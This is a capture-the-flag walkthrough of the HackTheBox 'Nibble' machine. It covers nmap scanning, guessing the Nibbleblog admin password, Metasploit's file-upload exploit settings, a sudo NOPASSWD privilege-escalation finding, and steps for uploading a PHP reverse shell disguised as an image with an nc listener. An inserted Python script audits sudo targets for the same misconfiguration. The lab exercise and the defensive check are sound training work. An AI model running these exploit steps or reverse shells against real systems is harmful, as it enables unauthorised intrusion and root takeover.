Nibble is an easy machine based on a Nibbleblog vulnerability. Using Metasploit we gain the initial shell, and after exploiting SUID we gain root on the machine.
Machine Author: mrb3n
Machine Type: Linux
Machine Level: 3.7/10
Scanning the Network
$ nmap -sC -sV 10.10.10.75
The page source on port 80 gives us a hint about the /nibbleblog directory.
Running Dirbuster on Port 80
Admin.php looks interesting; let's try to brute-force it with some commonly used passwords.
Nibbleblog is on version 4.0.3, so let's find out whether there is any vulnerability available.
Exploiting the Server
searchsploit nibbleblog 4.0.3
Let's use Metasploit to exploit the vulnerability.
msf5 > use exploit/multi/http/nibbleblog_file_upload
msf5 exploit(multi/http/nibbleblog_file_upload) > set targeturi nibbleblog
targeturi => nibbleblog
msf5 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf5 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf5 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf5 exploit(multi/http/nibbleblog_file_upload) > exploit
$ find / -perm -u=s -type f 2>/dev/null
$ sudo -l
The output shows that we can run monitor.sh via sudo without a password.
This file does not exist, however, so it is possible to create a simple bash script in its place to achieve root access.
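A defender-side check for the misconfiguration described above, as an added example that is not part of the original write-up: it parses `sudo -l` output and flags NOPASSWD targets that are missing or that sit under a directory a non-root user controls. The sample output and the path /opt/example/monitor.sh are constructed placeholders.

```python
import os
import re
import stat

# Constructed sample of `sudo -l` output; the path is a placeholder.
SAMPLE_SUDO_L = """User demo may run the following commands on host:
    (root) NOPASSWD: /opt/example/monitor.sh
"""

def nopasswd_commands(sudo_l_output):
    """Return the absolute command paths granted with NOPASSWD."""
    paths = []
    for line in sudo_l_output.splitlines():
        m = re.search(r"NOPASSWD:\s*(.+)$", line)
        if not m:
            continue
        for entry in m.group(1).split(","):
            # First absolute word is the command; later words are arguments.
            cmd = next((w for w in entry.split() if w.startswith("/")), None)
            if cmd:
                paths.append(cmd)
    return paths

def _unsafe(st):
    # Not owned by root, or writable by group/other.
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_path(path):
    """Return findings for one sudo target; an empty list means clean."""
    path = os.path.abspath(path)
    findings = []
    try:
        if _unsafe(os.stat(path)):
            findings.append("target not root-owned or group/world-writable")
    except FileNotFoundError:
        findings.append("target does not exist")
    # Whoever controls an ancestor directory can create or replace the target.
    parent = os.path.dirname(path)
    while True:
        try:
            if _unsafe(os.stat(parent)):
                findings.append("directory not root-controlled: " + parent)
        except FileNotFoundError:
            findings.append("directory does not exist: " + parent)
        if parent == "/":
            break
        parent = os.path.dirname(parent)
    return findings

if __name__ == "__main__":
    for cmd in nopasswd_commands(SAMPLE_SUDO_L):
        print(cmd, audit_path(cmd))
```

Any finding on a NOPASSWD target means the rule should be removed or the script moved to a root-owned, non-writable location.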
STEP 1:- Find the PHP reverse shell.
I am using a Pentestmonkey reverse shell.
STEP 2:- Upload the PHP shell as an image.
STEP 3:- Setting up the reverse shell.
$ nc -lnvp 4444
STEP 4:- Visit the image URL; it will give back the reverse shell.
HackTheBox Write-up Nibble
InfoSec Write-ups – Medium